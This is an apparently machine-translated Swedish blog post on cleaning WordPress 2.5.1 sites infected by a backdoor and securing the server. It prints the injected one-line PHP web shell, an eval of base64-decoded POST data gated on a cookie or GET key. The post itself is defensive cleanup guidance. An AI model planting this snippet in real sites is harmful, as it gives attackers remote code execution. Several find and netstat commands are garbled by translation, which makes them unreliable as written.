Innan du läser detta inlägg, ska du se posta här, För att förstå någonting. :)
Jag hittade det i flera bloggfiler på stealthsettings.com, koder som liknar de nedan, som uppträdde som ett resultat av viruset med bedriften att WordPress.:
<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); utgång; }?>
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); utgång; }?>
Rengöring infekterade filer:
Ooookkkk ...
1. Den bästa lösningen, eftersom det är gjort säkerhetskopieringOch rensade databasen är att torka filer WordPress (du kan behålla wp-config.php och filer som inte är strikt relaterade till wp-plattformen, efter att de har kontrollerats noggrant) från servern och ladda upp de ursprungliga från versionen 2.5.1 (Vid detta tillfälle och göra en versionsuppgradering wp :)) http://wordpress.org/download/ . Torka inklusive temafiler om du inte litar på att du kan kontrollera dem noga.
Det verkar ha påverkats och filer av de teman som inte har använts tidigare på bloggen och helt enkelt byta temat inte löser detta problem.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); utgång; }?>
2. Sök och ta bort alla filer som innehåller:... * _new.php * _old.php * Jpgg * Giff * Pngg och wp-info.txt fil, om något.
hitta. -namn “* _new.php”
hitta. -namn “* _old.php”
hitta. -namn "* .jpgg"
hitta. -namn “* _giff”
hitta. -namn “* _pngg”
hitta. -namn “wp-info.txt”
3. i / Tmp , Söka och ta bort mappar som tmpYwbzT2
SQL Rengöring :
1. I tabellen tabellen wp_options Kontrollera och ta bort raderna: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Allt i wp_options, gå till active_plugins och ta bort om det finns en plugin som slutar i en av de förlängningar * _new.php * _old.php *. jpgg *. GIFF *. pngg eller om man misstänker en annan anknytning, kolla noga.
3. Bord wp_users, Se om det finns en användare som inte har skrivit något i sin högra, kolumnen user_nicename. Ta bort denna användare, men kom ihåg numret i ID-kolumnen. Den här användaren kommer sannolikt att använda "WordPress"Ca user_login och där det är skapat på 00: 00: 00 0000-00-00.
4. Gå till tabell wp_usermeta och ta bort alla rader som hör ID ovan.
När du har gjort denna SQL-rengöring, inaktivera och aktivera sedan eventuellt plugin. (i blogg -> Instrumentpanel -> Plugins)
Säkra server:
1. Se vilka kataloger och filer "skrivbar"(chmod 777) och försök att sätta en chmod som inte längre tillåter deras skrivande på någon nivå. (chmod 644, till exempel)
Sök. -Perm-2-ls
2. Se vad som är filer sattes bit suid eller SGID . Om du inte använder dessa filer sätta på dem chmod 0 eller avinstallera det paket som den innehåller. De är mycket farliga eftersom de utför privilegier "grupp"Eller"rot"Och inte med normala användarrättigheter för att köra den filen.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Kolla vilka portar är öppna och försöker stänga eller fästa de som inte används.
netstat-an | grep-i lyssnar
Så mycket. Jag ser Vissa bloggar är förbjudna de Google Search och andra säger "Han gjorde dem bra!!!" . Tja, jag skulle ha gjort det för dem...men vad säger man om Google börjar förbjuda alla platser formning SE SPAM och satte trojan (Trojan.Clicker.HTML) i kakor?
Det här inlägget ändrades senast den 5 maj 2021 13:42
Visa kommentarer (0)